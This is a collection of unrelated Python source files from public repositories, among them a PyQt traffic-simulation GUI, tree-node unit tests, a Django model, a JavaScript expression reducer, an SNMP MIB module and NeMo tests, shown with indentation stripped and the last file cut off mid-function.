GUI_code.py | MaazKhurram/Emergency-Response-System | 1 | 12799076 |
from PyQt5 import QtGui
from PyQt5.QtWidgets import QApplication,QMainWindow, QWidget, QPushButton
from PyQt5.QtGui import QPainter,QBrush, QPen
from PyQt5.QtCore import Qt
from PyQt5.QtCore import QTimer
from PyQt5.QtGui import QTransform
from PyQt5.QtCore import QPointF
from CarMaintainer import CarMaintainer
from Algorithm import Algorithm
class Window(QMainWindow):
STATE_OF_EMERGENCY=1
def __init__(self):
super().__init__()
timer = QTimer(self)
timer.setInterval(20) # interval in ms
timer.timeout.connect(self.update)
timer.start(0)
self.title= "Emergency Response System"
self.top=100
self.left=100
self.width=500
self.height=500
#button = QPushButton('button', self)
#button.move(0,0)
#button.clicked.connect(self.on_click)
CarMaintainer()
Algorithm()
self.InitWindow()
def InitWindow(self):
self.setWindowIcon(QtGui.QIcon('icon.png'))
self.setWindowTitle(self.title)
self.setGeometry(self.top,self.left,self.width,self.height)
self.show()
def on_click(self):
Window.STATE_OF_EMERGENCY=1
def paintEvent(self, e):
painter= QPainter(self)
reflecting_axis= QTransform(1,0,0,0,-1,0,250,250,1) #translating the coordinate system to the middle of the screen and reflecting it about x axis to make positive y cooredinates above x axis
painter.setTransform(reflecting_axis)
painter.setPen(QPen(Qt.black,1,Qt.SolidLine))
painter.setBrush(QBrush(Qt.gray,Qt.SolidPattern))
painter.drawEllipse(QPointF(0,0),250,250) #draw outer lane
painter.setPen(QPen(Qt.yellow,5,Qt.DashLine))
painter.setBrush(QBrush(Qt.gray,Qt.SolidPattern))
painter.drawEllipse(QPointF(0,0),150,150) #draw inner lane
painter.setPen(QPen(Qt.black,2,Qt.SolidLine))
painter.setBrush(QBrush(Qt.black,Qt.SolidPattern))
painter.drawEllipse(QPointF(0,0),50,50) #black centre
# -------------------------------------------------------------------------------------------------------------
# Drawing lanes is complete. Now drawing cars
painter.setBrush(QBrush(Qt.green,Qt.SolidPattern))
counter=1
for point in Algorithm.run_algorithm(Window.STATE_OF_EMERGENCY):
if counter==1:
painter.drawEllipse(QPointF(point[0], point[1]),10,10)
counter=-1
else:
painter.drawEllipse(QPointF(point[0], point[1]),5,5)
counter=1
for a_car in CarMaintainer.Inner_Car_List:
if a_car.PSUEDO_CAR==False:
painter.drawEllipse(a_car.calculate_position(),a_car.CAR_GUI_RADIUS,a_car.CAR_GUI_RADIUS)
painter.drawText(a_car.calculate_position(),str(a_car.CarNumber))
else:
painter.setPen(QPen(Qt.red,1,Qt.DashLine)) #new paint settings for Psuedo car
painter.setBrush(QBrush(Qt.gray,Qt.NoBrush))
painter.drawEllipse(a_car.calculate_position(),a_car.CAR_GUI_RADIUS,a_car.CAR_GUI_RADIUS)
painter.drawText(a_car.calculate_position(),str(a_car.CarNumber))
painter.setPen(QPen(Qt.black,2,Qt.SolidLine)) # restore paint settings after drawing a psuedo car
painter.setBrush(QBrush(Qt.green,Qt.SolidPattern))
for a_car in CarMaintainer.Outer_Car_List:
if a_car.IS_AMBULANCE == False :
painter.drawEllipse(a_car.calculate_position(),a_car.CAR_GUI_RADIUS,a_car.CAR_GUI_RADIUS)
painter.drawText(a_car.calculate_position(),str(a_car.CarNumber))
else:
painter.setBrush(QBrush(Qt.red,Qt.SolidPattern))
painter.drawEllipse(a_car.calculate_position(),a_car.CAR_GUI_RADIUS,a_car.CAR_GUI_RADIUS)
painter.drawText(a_car.calculate_position(),str(a_car.CarNumber))
painter.setBrush(QBrush(Qt.green,Qt.SolidPattern))
for a_car in CarMaintainer.In_Transition_List:
painter.setBrush(QBrush(Qt.yellow,Qt.SolidPattern))
painter.drawEllipse(a_car.calculate_position(),a_car.CAR_GUI_RADIUS,a_car.CAR_GUI_RADIUS)
painter.drawText(a_car.calculate_position(),str(a_car.CarNumber))
painter.setBrush(QBrush(Qt.green,Qt.SolidPattern))
painter.setPen(QPen(Qt.red,1,Qt.SolidLine))
painter.setBrush(QBrush(Qt.green,Qt.NoBrush))
painter.drawEllipse(QPointF(0,0),100,100) #draw constuction line on inner lane
painter.drawEllipse(QPointF(0,0),200,200) #draw constuction line on outer lane
painter.setPen(QPen(Qt.red,1,Qt.SolidLine))
painter.setBrush(QBrush(Qt.red,Qt.SolidPattern))
# painter.drawEllipse(QPointF(100,0),5,5)
# painter.drawEllipse(QPointF(-100,0),5,5)
# painter.drawEllipse(QPointF(0,-100),5,5)
painter.drawEllipse(QPointF(0,0),10,10)
| 2.8125 | 3 |
placidity/tests/test_node.py | bebraw/Placidity | 2 | 12799077 | # -*- coding: utf-8 -*-
from placidity.node import Node, TreeNode
class TestNode():
def test_append_children_to_node(self):
node1, node2 = Node(), Node()
node1.children.append(node2)
assert node1.children[0] == node2
assert node2.parents[0] == node1
def test_append_parents_to_node(self):
node1, node2 = Node(), Node()
node1.parents.append(node2)
assert node1.parents[0] == node2
assert node2.children[0] == node1
def test_append_same_node_as_child_and_parent(self):
node1, node2 = Node(), Node()
node1.children.append(node2)
node1.parents.append(node2)
assert node1.children[0] == node2
assert node1.parents[0] == node2
assert node2.children[0] == node1
assert node2.parents[0] == node1
def test_append_same_node_as_child_multiple_times(self):
node1, node2 = Node(), Node()
node1.children.append(node2)
node1.children.append(node2)
node1.children.append(node2)
assert node1.children[0] == node2
assert node2.parents[0] == node1
assert len(node1.children) == 1
assert len(node2.parents) == 1
def test_append_same_node_as_parent_multiple_times(self):
node1, node2 = Node(), Node()
node1.parents.append(node2)
node1.parents.append(node2)
node1.parents.append(node2)
assert node1.parents[0] == node2
assert node2.children[0] == node1
assert len(node1.parents) == 1
assert len(node2.children) == 1
def test_multi_append(self):
node1, node2, node3 = Node(), Node(), Node()
node1.children.append(node2, node3)
assert len(node1.children) == 2
assert node2 in node1.children
assert node3 in node1.children
def test_remove_child_node(self):
node1, node2 = Node(), Node()
node1.children.append(node2)
node1.children.remove(node2)
assert len(node1.children) == 0
assert len(node2.parents) == 0
def test_remove_parent_node(self):
node1, node2 = Node(), Node()
node1.parents.append(node2)
node1.parents.remove(node2)
assert len(node1.parents) == 0
assert len(node2.children) == 0
def test_remove_same_node_multiple_times(self):
node1, node2 = Node(), Node()
node1.parents.append(node2)
node1.parents.remove(node2)
node1.parents.remove(node2)
node1.parents.remove(node2)
assert len(node1.parents) == 0
assert len(node2.children) == 0
def test_multi_remove(self):
node1, node2, node3 = Node(), Node(), Node()
node1.children.append(node2, node3)
node1.children.remove(node2, node3)
assert len(node1.children) == 0
def test_find_immediate_child_node(self):
node1, node2 = Node(), Node()
node2.name = 'node to be found'
node1.children.append(node2)
assert node1.find_child(name='node to be found') == node2
def test_find_child_node_no_results(self):
node1 = Node()
assert node1.find_child(name='just some name') == None
def test_find_child_node_from_node_tree(self):
node1 = Node()
node1a = Node()
node1a1 = Node()
node1a1.color = 'blue'
node1a2 = Node()
node1a2.value = 13
node1b = Node()
node1b1 = Node()
node1b1.find_me = True
node1b1.color = 'blue'
node1.children.append(node1a, node1b)
node1a.children.append(node1a1, node1a2)
node1b.children.append(node1b1)
assert node1.find_child(value=13) == node1a2
assert node1.find_child(find_me=True) == node1b1
assert node1.find_child(color='blue') == [node1a1, node1b1]
def test_find_immediate_parent_node(self):
node1, node2 = Node(), Node()
node2.name = 'node to be found'
node1.parents.append(node2)
assert node1.find_parent(name='node to be found') == node2
def test_find_parent_node_no_results(self):
node1 = Node()
assert node1.find_parent(name='just some name') == None
def test_find_parent_node_from_node_tree(self):
node1 = Node()
node1a = Node()
node1a1 = Node()
node1a1.color = 'blue'
node1a2 = Node()
node1a2.value = 13
node1b = Node()
node1b1 = Node()
node1b1.find_me = True
node1b1.color = 'blue'
node1.parents.append(node1a, node1b)
node1a.parents.append(node1a1, node1a2)
node1b.parents.append(node1b1)
assert node1.find_parent(value=13) == node1a2
assert node1.find_parent(find_me=True) == node1b1
assert node1.find_parent(color='blue') == [node1a1, node1b1]
assert node1.find_parent(find_me=True, color='blue') == node1b1
def test_find_root(self):
node1, node1a, node1b, node1a1 = Node(), Node(), Node(), Node()
node1.children.append(node1a, node1b)
node1a.children.append(node1a1)
assert node1.find_root() == None
assert node1a.find_root() == node1
assert node1b.find_root() == node1
assert node1a1.find_root() == node1
def test_cyclic_find(self):
node1, node2 = Node(), Node()
node1.children.append(node2)
node2.children.append(node1)
assert node1.find_root() == None
assert node2.find_root() == None
def test_find_parent_with_value_name(self):
node1, node2, node3 = Node(), Node(), Node()
node3.attribute_to_find = 'find me'
node1.parents.append(node2)
node2.parents.append(node3)
assert node1.find_parent_with_attribute('attribute_to_find') == node3
def test_walk(self):
node1, node2, node3, node4 = Node(), Node(), Node(), Node()
node5 = Node()
node1.children.append(node2)
node1.children.append(node5)
node2.children.append(node3)
node2.children.append(node4)
result = (node1, node3, node4, node2, node5 )
for i, node in enumerate(node1.walk()):
assert node == result[i], '%s %s %s' % (i, node, result[i])
class TestTreeNode():
def test_set_parent(self):
node1, node2 = TreeNode(), TreeNode()
node1.parent = node2
assert node1.parent == node2
assert node2.children == [node1, ]
def test_set_parent_twice(self):
node1, node2, node3 = TreeNode(), TreeNode(), TreeNode()
node1.parent = node2
node1.parent = node3
assert node2.children == []
assert node3.children == [node1, ]
def test_find(self):
node1, node2, node3 = TreeNode(), TreeNode(), TreeNode()
node2.parent = node1
node3.parent = node1
node2.name = 'foo'
node3.name = 'bar'
assert node1.find(name='foo') == node2
assert node1.find(name='bar') == node3
assert node1.find(name='dummy') == None
assert node2.find(name='foo') == None
| 3.78125 | 4 |
GodwillOnyewuchi/Phase 1/Python Basic 2/day 9 task/task 7.py | CodedLadiesInnovateTech/-python-challenge-solutions | 6 | 12799078 | #Python program to test whether the system is a big-endian platform or little-endian platform
import sys
if sys.byteorder == "little":
print("Little-endian platform.") # its an intel, alpha
else:
print("Big-endian platform.") # its a motorola, sparc | 2.828125 | 3 |
python/bob/bob.py | fruit-in/exercism-solution | 9 | 12799079 | def response(hey_bob):
question = hey_bob.rstrip().endswith('?')
yell = any(c.isupper() for c in hey_bob) \
and not any(c.islower() for c in hey_bob)
nothing = not hey_bob.strip()
if question and not yell:
return "Sure."
elif not question and yell:
return "Whoa, chill out!"
elif question and yell:
return "Calm down, I know what I'm doing!"
elif nothing:
return "Fine. Be that way!"
else:
return "Whatever."
| 3.5625 | 4 |
setup.py | jicho/quicklock | 4 | 12799080 | from distutils.core import setup
setup(
name = 'quicklock',
packages = ['quicklock'],
version = '0.1.7',
description = 'A simple Python resource lock to ensure only one process at a time is operating with a particular resource.',
author = '<NAME>',
author_email = '<EMAIL>',
url = 'https://github.com/NateFerrero/quicklock',
download_url = 'https://github.com/NateFerrero/quicklock/tarball/0.1.7',
keywords = ['lock', 'locking', 'singleton', 'process', 'resource', 'exclusive lock'],
classifiers = [],
platforms='any',
install_requires = [
'psutil>=2.2'
]
)
| 1.632813 | 2 |
new_customers/models.py | bashmak/djing | 23 | 12799081 | <gh_stars>10-100
from django.shortcuts import resolve_url
from django.utils.translation import gettext_lazy as _
from django.db import models
from django.conf import settings
from django.core.validators import RegexValidator
from group_app.models import Group
class PotentialSubscriber(models.Model):
fio = models.CharField(_('fio'), max_length=256)
telephone = models.CharField(
max_length=16,
verbose_name=_('Telephone'),
blank=True,
null=True,
validators=(RegexValidator(
getattr(settings, 'TELEPHONE_REGEXP', r'^(\+[7893]\d{10,11})?$')
),)
)
group = models.ForeignKey(
Group,
on_delete=models.SET_NULL,
blank=True, null=True,
verbose_name=_('User group')
)
town = models.CharField(
_('Town'),
help_text=_('Town, if group does not already exist'),
max_length=127, blank=True, null=True
)
street = models.CharField(_('Street'), max_length=127, blank=True, null=True)
house = models.CharField(
_('House'),
max_length=12,
null=True,
blank=True
)
description = models.TextField(
_('Comment'),
null=True,
blank=True
)
make_data = models.DateTimeField(_('Create date'), auto_now_add=True)
deadline = models.DateField(
_('Deadline connection'),
help_text=_('Date when connection must be finished'),
blank=True, null=True
)
def get_absolute_url(self):
return resolve_url('new_customers:user', uid=self.pk)
class Meta:
db_table = 'new_customers'
verbose_name = _('Potential customer')
verbose_name_plural = _('Potential customers')
ordering = '-id',
| 2.0625 | 2 |
tests/cli/test_base.py | ssato/python-anyconfig | 213 | 12799082 | #
# Copyright (C) 2013 - 2021 <NAME> <<EMAIL>>
# License: MIT
#
# pylint: disable=missing-docstring
"""test cases for anyconfig.cli module.
"""
import contextlib
import io
import pathlib
import sys
import tempfile
import unittest
import anyconfig.api
import anyconfig.cli as TT
from .. import base
from . import collectors, datatypes
def make_args(_self, tdata):
"""Make arguments to run cli.main.
"""
return ['anyconfig_cli'] + tdata.opts + [str(tdata.inp_path)]
class BaseTestCase(unittest.TestCase):
"""Base Test case.
"""
collector = collectors.Collector()
make_args = make_args
def setUp(self):
if self.collector:
self.collector.init()
def post_checks(self, tdata, *args, **kwargs):
"""Placeholder to do more post checks.
"""
pass
def _run_main(self, tdata):
"""Wrapper for cli.main."""
args = self.make_args(tdata)
if tdata.outname: # Running cli.main will output files.
self.assertTrue(
tdata.ref is not None,
'No reference data was given, {tdata!r}'
)
with tempfile.TemporaryDirectory() as tdir:
opath = pathlib.Path(tdir) / tdata.outname
# Run anyconfig.cli.main with arguments.
TT.main(args + ['-o', str(opath)])
if tdata.exp.exit_code_matches and tdata.exp.exit_code == 0:
self.assertTrue(opath.exists(), str(opath))
try:
odata = anyconfig.api.load(opath, **tdata.oo_opts)
except anyconfig.api.UnknownFileTypeError:
odata = anyconfig.api.load(opath, ac_parser='json')
self.assertEqual(odata, tdata.ref, repr(tdata))
self.post_checks(tdata, opath)
else:
# Likewise but without -o <output_path> option.
TT.main(args)
self.post_checks(tdata)
sys.exit(0)
def run_main(self, tdata) -> None:
"""
Run anyconfig.cli.main and check if the exit code was expected one.
"""
expected: datatypes.Expected = tdata.exp
with self.assertRaises(expected.exception, msg=repr(tdata)) as ctx:
with contextlib.redirect_stdout(io.StringIO()) as stdout:
with contextlib.redirect_stderr(io.StringIO()) as stderr:
self._run_main(tdata)
exc = ctx.exception
self.assertTrue(isinstance(exc, expected.exception))
ecode = getattr(exc, 'error_code', getattr(exc, 'code', 1))
if expected.exit_code_matches:
self.assertEqual(ecode, expected.exit_code, f'{tdata!r}')
else:
self.assertNotEqual(ecode, expected.exit_code, f'{tdata!r}')
if expected.words_in_stdout:
msg = stdout.getvalue()
self.assertTrue(expected.words_in_stdout in msg, msg)
if expected.words_in_stderr:
err = stderr.getvalue()
self.assertTrue(expected.words_in_stderr in err, err)
def test_runs_for_datasets(self) -> None:
if self.collector and self.collector.initialized:
if self.collector.kind == base.TDataCollector.kind:
return
for tdata in self.collector.each_data():
self.run_main(tdata)
class NoInputTestCase(BaseTestCase):
"""Test cases which does not require inputs.
"""
def make_args(self, tdata): # pylint: disable=no-self-use
"""Make arguments to run cli.main.
"""
return ['anyconfig_cli'] + tdata.opts
# vim:sw=4:ts=4:et:
| 2.21875 | 2 |
tool/pylib/ecmascript/transform/optimizer/reducer.py | mever/qooxdoo | 1 | 12799083 | <gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
################################################################################
#
# qooxdoo - the new era of web development
#
# http://qooxdoo.org
#
# Copyright:
# 2006-2013 1&1 Internet AG, Germany, http://www.1und1.de
#
# License:
# MIT: https://opensource.org/licenses/MIT
# See the LICENSE file in the project's top-level directory for details.
#
# Authors:
# * <NAME> (thron7)
#
################################################################################
##
# Reduce the value of a syntax tree (expression).
##
import os, sys, re, types, operator, functools as func
from ecmascript.frontend import treeutil, treegenerator
from ecmascript.frontend.treegenerator import symbol
from ecmascript.frontend import Scanner
from misc import util
##
# ASTReducer - newer approach: A general AST reducer
#
# Computes new, pot. reduced tree. Does a post-order recursion (children first).
# Carries .evaluated with nodes, to keep the Python value for a tree/contant
# node, for easier operations, checking for hasattr() to determine
# evaluated-ness.
class ASTReducer(treeutil.NodeVisitor):
def __init__(self, root_node):
super(ASTReducer, self).__init__()
self.root_node = root_node
self.operations = self._init_operations()
def _init_operations(self):
operations = {}
types_Number = (types.IntType, types.LongType, types.FloatType, types.BooleanType)
def opr(operation, op1, op2):
if all([isinstance(x, types_Number) for x in (op1, op2)]):
return operation(op1, op2)
else:
return ()
operations['MUL'] = func.partial(opr, operator.mul)
operations['DIV'] = func.partial(opr, operator.truediv)
operations['MOD'] = func.partial(opr, operator.mod)
# Have to distinguish between prefix and infix +/-
def opr(operation, op1, op2=()):
result = ()
if isinstance(op1, types_Number):
# prefix +/-
if op2==():
if operation=='+':
result = operator.pos(op1)
elif operation=='-':
result = operator.neg(op1)
elif isinstance(op2, types_Number):
if operation=='+':
result = operator.add(op1,op2)
elif operation=='-':
result = operator.sub(op1,op2)
# string '+'
elif operation=='+' and all([isinstance(x,types.StringTypes) for x in (op1,op2)]):
result = operator.add(op1,op2)
return result
operations['ADD'] = func.partial(opr, '+')
operations['SUB'] = func.partial(opr, '-')
#operations['INC'] -- only on vars!
#operations['DEC'] -- only on vars!
operations['EQ'] = operator.eq
operations['SHEQ'] = operator.eq
operations['NE'] = operator.ne
operations['SHNE'] = operator.ne
operations['LT'] = operator.lt
operations['LE'] = operator.le
operations['GT'] = operator.gt
operations['GE'] = operator.ge
operations['NOT'] = operator.not_
operations['AND'] = lambda x,y: x and y
operations['OR'] = lambda x,y: x or y
# bit operations only operate on 32-bit integers in JS
operations['BITAND'] = operator.and_
operations['BITOR'] = operator.or_
operations['BITXOR'] = operator.xor
operations['BITNOT'] = operator.inv
# second shift operand must be in 0..31 in JS
def opr(operation, op1, op2):
op2 = (op2 & 0x1f) # coerce to 0..31
return operation(op1,op2)
operations['LSH'] = func.partial(opr, operator.lshift)
#def rsh(op1, op2): # http://bit.ly/13v4Adq
# sign = (op1 >> 31) & 1
# if sign:
# fills = ((sign << op2) - 1) << (32 - op2)
# else:
# fills = 0
# return ((op1 & 0xffffffff) >> op2) | fills
#operations['RSH'] = func.partial(opr, rsh)
operations['RSH'] = func.partial(opr, operator.rshift)
def ursh(op1, op2):
op1 = (op1 & 0xffffffff) # coerce to 32-bit int
return operator.rshift(op1, op2) # Python .rshift does 0 fill
operations['URSH'] = func.partial(opr, ursh)
# ?:
def opr(op1, op2, op3):
return op2 if bool(op1) else op3
operations['HOOK'] = opr
return operations
# end:_init_operations
def visit(self, node):
# pre-order reduce children, to have their values when reducing current
# node
nchilds = []
for child in node.children:
nchild = self.visit(child)
nchilds.append(nchild)
nnode = node
nnode.children = []
for cld in nchilds:
nnode.addChild(cld)
# try reducing current node, might return a fresh symbol()
if hasattr(self, "visit_"+node.type):
nnode = getattr(self, "visit_"+node.type)(nnode)
return nnode
# - Due to pre-order recursion, type-specific methods don't need to recurse
# anymore!
def visit_constant(self, node):
constvalue = node.get("value")
consttype = node.get("constantType")
value = () # the empty tuple indicates unevaluated
if consttype == "number":
constdetail = node.get("detail")
if constdetail == "int":
value = util.parseInt(constvalue)
elif constdetail == "float":
value = float(constvalue)
elif consttype == "string":
value = constvalue
elif consttype == "boolean":
value = {"true":True, "false":False}[constvalue]
elif consttype == "null":
value = None
if value!=():
node.evaluated = value
return node
def visit_operation(self, node):
operator = node.get("operator")
arity = len(node.children)
if arity == 1:
nnode = self._visit_monadic(node, operator)
elif arity == 2:
nnode = self._visit_dyadic(node, operator)
elif arity == 3:
nnode = self._visit_triadic(node, operator)
return nnode
##
# IF
def visit_loop(self, node):
loop_type = node.get("loopType")
nnode = node
if loop_type == "IF":
cond_node = node.children[0]
if hasattr(cond_node, "evaluated"):
value = bool(cond_node.evaluated)
nnode, is_empty = treeutil.inlineIfStatement(node, value, inPlace=False)
return nnode
##
# (group)
def visit_group(self, node):
nnode = node
# can only reduce "(3)" or "('foo')" or "(true)" etc.
if len(node.children)==1:
expr_node = node.children[0]
if expr_node.type == 'constant': # must have been evaluated by pre-order
nnode = expr_node
return nnode
def _visit_monadic(self, node, operator):
op1 = node.children[0]
nnode = node
if hasattr(op1, "evaluated"):
if operator in self.operations:
evaluated = self.operations[operator](op1.evaluated)
if evaluated!=():
nnode = symbol("constant")(
node.get("line"), node.get("column"))
set_node_type_from_value(nnode, evaluated)
nnode.evaluated = evaluated
return nnode
def _visit_dyadic(self, node, operator):
op1 = node.children[0]
op2 = node.children[1]
nnode = node
if operator in self.operations:
if operator in ['AND', 'OR'] and hasattr(op1, 'evaluated'): # short-circuit ops
evaluated = self.operations[operator](op1.evaluated, op2)
nnode = op1 if evaluated==op1.evaluated else op2
elif all([hasattr(x, 'evaluated') for x in (op1, op2)]):
evaluated = self.operations[operator](op1.evaluated, op2.evaluated)
if evaluated!=():
nnode = symbol("constant")(
node.get("line"), node.get("column"))
set_node_type_from_value(nnode, evaluated)
nnode.evaluated = evaluated
return nnode
##
# HOOK
def _visit_triadic(self, node, operator):
op1 = node.children[0]
op2 = node.children[1]
op3 = node.children[2]
nnode = node
if operator in self.operations:
# to evaluate HOOK, it is enough to evaluate the condition
if operator == "HOOK" and hasattr(op1, 'evaluated'):
nnode = self.operations[operator](op1.evaluated, op2, op3)
return nnode
##
# Take a Python value and init a constant node with it, setting the node's "constantType"
#
def set_node_type_from_value(valueNode, value):
if isinstance(value, types.StringTypes):
valueNode.set("constantType","string")
quotes, escaped_value = escape_quotes(value)
valueNode.set("detail", quotes)
valueNode.set("value", escaped_value)
elif isinstance(value, types.BooleanType):
# this has to come early, as isinstance(True, types.IntType) is also true!
valueNode.set("constantType","boolean")
valueNode.set("value", str(value).lower())
elif isinstance(value, (types.IntType, types.LongType)):
valueNode.set("constantType","number")
valueNode.set("detail", "int")
valueNode.set("value", str(value))
elif isinstance(value, types.FloatType):
valueNode.set("constantType","number")
valueNode.set("detail", "float")
valueNode.set("value", str(value))
elif isinstance(value, types.NoneType):
valueNode.set("constantType","null")
valueNode.set("value", "null")
else:
raise ValueError("Illegal value for JS constant: %s" % str(value))
return valueNode
##
# Determine the quoting to be used on that string in code ('singlequotes',
# 'doublequotes'), and escape pot. embedded quotes correspondingly.
# (The string might result from a concat operation that combined differently
# quoted strings, like 'fo"o"bar' + "ba"\z\"boing").
#
def escape_quotes(s):
quotes = 'singlequotes' # aribtrary choice
result = s
# only if we have embedded quotes we have to check escaping
if "'" in s:
result = []
chunks = s.split("'")
for chunk in chunks[:-1]:
result.append(chunk)
if not Scanner.is_last_escaped(chunk + "'"):
result.append('\\')
result.append("'")
result.append(chunks[-1])
result = u''.join(result)
return quotes, result
# - ---------------------------------------------------------------------------
def ast_reduce(node):
reducer = ASTReducer(node)
new_node = reducer.visit(node)
return new_node
| 2.265625 | 2 |
agents/meinberg_m1000/mibs/MBG-SNMP-ROOT-MIB.py | simonsobs/socs | 6 | 12799084 | <reponame>simonsobs/socs<filename>agents/meinberg_m1000/mibs/MBG-SNMP-ROOT-MIB.py<gh_stars>1-10
#
# PySNMP MIB module MBG-SNMP-ROOT-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file://./MBG-SNMP-ROOT-MIB.mib
# Produced by pysmi-0.3.4 at Fri May 1 22:39:55 2020
# On host grumpy platform Linux version 4.15.0-88-generic by user bjk49
# Using Python version 3.6.9 (default, Apr 18 2020, 01:56:04)
#
OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, ValueSizeConstraint, SingleValueConstraint, ValueRangeConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "ValueSizeConstraint", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsIntersection")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
IpAddress, Gauge32, ModuleIdentity, Unsigned32, enterprises, Bits, Integer32, ObjectIdentity, iso, Counter64, NotificationType, TimeTicks, Counter32, MibScalar, MibTable, MibTableRow, MibTableColumn, MibIdentifier = mibBuilder.importSymbols("SNMPv2-SMI", "IpAddress", "Gauge32", "ModuleIdentity", "Unsigned32", "enterprises", "Bits", "Integer32", "ObjectIdentity", "iso", "Counter64", "NotificationType", "TimeTicks", "Counter32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "MibIdentifier")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
mbgSnmpRoot = ModuleIdentity((1, 3, 6, 1, 4, 1, 5597))
mbgSnmpRoot.setRevisions(('2012-01-25 07:45', '2011-10-14 06:30',))
if mibBuilder.loadTexts: mbgSnmpRoot.setLastUpdated('201201250745Z')
if mibBuilder.loadTexts: mbgSnmpRoot.setOrganization('Meinberg Radio Clocks GmbH & Co. KG')
class MeinbergSwitch(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1))
namedValues = NamedValues(("off", 0), ("on", 1))
mibBuilder.exportSymbols("MBG-SNMP-ROOT-MIB", mbgSnmpRoot=mbgSnmpRoot, MeinbergSwitch=MeinbergSwitch, PYSNMP_MODULE_ID=mbgSnmpRoot)
| 1.703125 | 2 |
tests/core/test_neural_modules_pytorch.py | borisdayma/NeMo | 0 | 12799085 | <reponame>borisdayma/NeMo<gh_stars>0
# ! /usr/bin/python
# -*- coding: utf-8 -*-
# =============================================================================
# Copyright 2020 NVIDIA. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
# TODO: These test look bad/useless - redo
import unittest
import nemo
from nemo.backends.pytorch.nm import TrainableNM
from nemo.core.neural_types import ChannelType, NeuralType
from tests.common_setup import NeMoUnitTest
class TestNM1(TrainableNM):
def __init__(self, var1=1, var2=2, var3=3):
super(TestNM1, self).__init__()
class TestNM2(TestNM1):
def __init__(self, var2):
super(TestNM2, self).__init__(var2=var2)
class TestNeuralModulesPT(NeMoUnitTest):
def setUp(self) -> None:
super().setUp()
# Mockup abstract methods.
TestNM1.__abstractmethods__ = set()
TestNM2.__abstractmethods__ = set()
def test_default_init_params(self):
simple_nm = TestNM1(var1=1)
init_params = simple_nm.init_params
self.assertEqual(init_params["var1"], 1)
self.assertEqual(init_params["var2"], 2)
self.assertEqual(init_params["var3"], 3)
def test_simple_init_params(self):
simple_nm = TestNM1(var1=10, var3=30)
init_params = simple_nm.init_params
self.assertEqual(init_params["var1"], 10)
self.assertEqual(init_params["var2"], 2)
self.assertEqual(init_params["var3"], 30)
def test_nested_init_params(self):
simple_nm = TestNM2(var2="hello")
init_params = simple_nm.init_params
self.assertEqual(init_params["var2"], "hello")
def test_constructor_TaylorNet(self):
tn = nemo.backends.pytorch.tutorials.TaylorNet(dim=4)
self.assertEqual(tn.init_params["dim"], 4)
def test_call_TaylorNet(self):
x_tg = nemo.core.neural_modules.NmTensor(
producer=None,
producer_args=None,
name=None,
ntype=NeuralType(elements_type=ChannelType(), axes=('B', 'D')),
)
tn = nemo.backends.pytorch.tutorials.TaylorNet(dim=4)
# note that real port's name: x was used
y_pred = tn(x=x_tg)
self.assertEqual(y_pred.producer, tn)
self.assertEqual(y_pred.producer_args.get("x"), x_tg)
def test_simple_chain(self):
data_source = nemo.backends.pytorch.tutorials.RealFunctionDataLayer(n=10000, batch_size=1)
trainable_module = nemo.backends.pytorch.tutorials.TaylorNet(dim=4)
loss = nemo.backends.pytorch.tutorials.MSELoss()
x, y = data_source()
y_pred = trainable_module(x=x)
loss_tensor = loss(predictions=y_pred, target=y)
# check producers' bookkeeping
self.assertEqual(loss_tensor.producer, loss)
self.assertEqual(loss_tensor.producer_args, {"predictions": y_pred, "target": y})
self.assertEqual(y_pred.producer, trainable_module)
self.assertEqual(y_pred.producer_args, {"x": x})
self.assertEqual(y.producer, data_source)
self.assertEqual(y.producer_args, {})
self.assertEqual(x.producer, data_source)
self.assertEqual(x.producer_args, {})
| 2.125 | 2 |
pybolt/bolt_nlp/char_cnn_classification/model.py | mikuh/pybolt | 0 | 12799086 | <gh_stars>0
import tensorflow as tf
class CharCNN(tf.keras.Model):
def __init__(self, ):
pass
| 1.859375 | 2 |
bika/lims/vocabularies/__init__.py | hocinebendou/bika.gsoc | 0 | 12799087 | <filename>bika/lims/vocabularies/__init__.py
# -*- coding:utf-8 -*-
from Acquisition import aq_get
from bika.lims import bikaMessageFactory as _
from bika.lims.utils import t
from bika.lims.interfaces import IDisplayListVocabulary, ICustomPubPref
from bika.lims.utils import to_utf8
from Products.Archetypes.public import DisplayList
from Products.CMFCore.utils import getToolByName
from zope.interface import implements
from pkg_resources import resource_filename
from plone.resource.utils import iterDirectoriesOfType
from zope.schema.interfaces import IVocabularyFactory
from zope.schema.vocabulary import SimpleTerm
from zope.schema.vocabulary import SimpleVocabulary
from zope.component import getAdapters
from zope.site.hooks import getSite
import os
import glob
class CatalogVocabulary(object):
"""Make vocabulary from catalog query.
"""
implements(IDisplayListVocabulary)
catalog = 'portal_catalog'
contentFilter = {}
key = 'UID'
value = 'Title'
def __init__(self, context, key=None, value=None, contentFilter=None):
self.context = context
self.key = key if key else self.key
self.value = value if value else self.value
self.contentFilter = \
contentFilter if contentFilter else self.contentFilter
def __call__(self, **kwargs):
site = getSite()
request = aq_get(site, 'REQUEST', None)
catalog = getToolByName(site, self.catalog)
if 'allow_blank' in kwargs:
allow_blank = True
del (kwargs['allow_blank'])
self.contentFilter.update(**kwargs)
# If a secondary deactivation/cancellation workflow is anbled,
# Be sure and select only active objects, unless other instructions
# are explicitly specified:
